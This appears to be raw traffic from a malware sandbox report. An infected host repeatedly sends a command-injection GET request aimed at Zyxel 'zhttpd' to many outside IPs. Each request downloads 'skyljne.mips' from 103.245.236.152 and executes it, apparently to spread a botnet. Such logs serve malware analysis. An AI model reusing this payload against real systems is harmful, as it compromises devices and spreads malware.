                                      Jan 14, 2024 15:50:42.210910082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3340192.168.2.1435872204.93.162.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210983038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3341192.168.2.1439214164.138.121.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211034060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3342192.168.2.145060072.84.56.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211078882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3343192.168.2.146063439.4.82.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211128950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3344192.168.2.143984492.207.236.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211190939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3345192.168.2.1446206159.113.82.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211239100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3346192.168.2.14407821.156.44.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211302042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3347192.168.2.1443816198.112.108.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211364985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3348192.168.2.1456638181.66.131.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211405993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3349192.168.2.14516088.24.83.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211487055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3350192.168.2.143351266.125.47.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211548090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3351192.168.2.1446514177.251.93.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211602926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3352192.168.2.143486072.236.24.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211673975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3353192.168.2.1444942167.112.176.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211730957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3354192.168.2.1435870162.150.23.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211776972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3355192.168.2.143384818.37.108.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211827993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3356192.168.2.144505841.11.8.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211896896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3357192.168.2.145921069.128.151.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.211958885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3358192.168.2.144713849.244.99.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212012053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3359192.168.2.1449414134.93.1.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212071896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3360192.168.2.1441428129.230.221.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212105036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3361192.168.2.1452040104.13.241.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212157965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3362192.168.2.144052231.106.159.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212225914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3363192.168.2.1452092221.216.119.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212289095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3364192.168.2.144830443.18.29.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212347031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3365192.168.2.1448574136.169.114.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212402105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3366192.168.2.143989461.78.118.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212430000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3367192.168.2.1442662216.137.87.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212493896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3368192.168.2.1445374204.147.135.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212527037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3369192.168.2.1456798130.233.141.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212596893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3370192.168.2.145816096.32.59.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212651968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3371192.168.2.1456922140.35.124.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212677956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3372192.168.2.1460830205.86.210.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212740898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3373192.168.2.1447006119.54.90.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212793112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3374192.168.2.14593285.8.150.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212826967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3375192.168.2.1450972157.196.50.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212907076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3376192.168.2.144552651.18.158.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.212965965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3377192.168.2.1448738171.206.28.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213009119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3378192.168.2.143767040.216.171.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213059902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3379192.168.2.144512234.67.7.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213095903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3380192.168.2.143651877.136.6.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213156939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3381192.168.2.1434602134.133.67.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213192940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3382192.168.2.143350637.132.85.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213248968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3383192.168.2.1436134114.198.88.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213284016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3384192.168.2.144956064.149.171.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213387012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3385192.168.2.144421046.242.1.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213423967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3386192.168.2.143319479.243.214.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213484049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3387192.168.2.143278474.162.65.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213511944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3388192.168.2.1438614163.212.104.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213565111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3389192.168.2.145198458.245.90.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213627100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3390192.168.2.144444846.189.189.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213685989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3391192.168.2.1451360130.203.71.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213736057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3392192.168.2.1454784149.203.204.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213793993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3393192.168.2.1448040175.61.206.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213867903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3394192.168.2.1433798114.226.156.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213895082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3395192.168.2.1442760122.22.83.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.213943958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3396192.168.2.1437880129.180.1.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.214018106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3397192.168.2.1442858104.237.165.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.214056015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3398192.168.2.14363849.124.96.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.214103937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3399192.168.2.144265470.204.106.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.214154005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3400192.168.2.144314474.0.96.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.214210987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3401192.168.2.145090681.230.41.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.214255095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3402192.168.2.1452798177.125.59.200443
                                      TimestampBytes transferredDirectionData
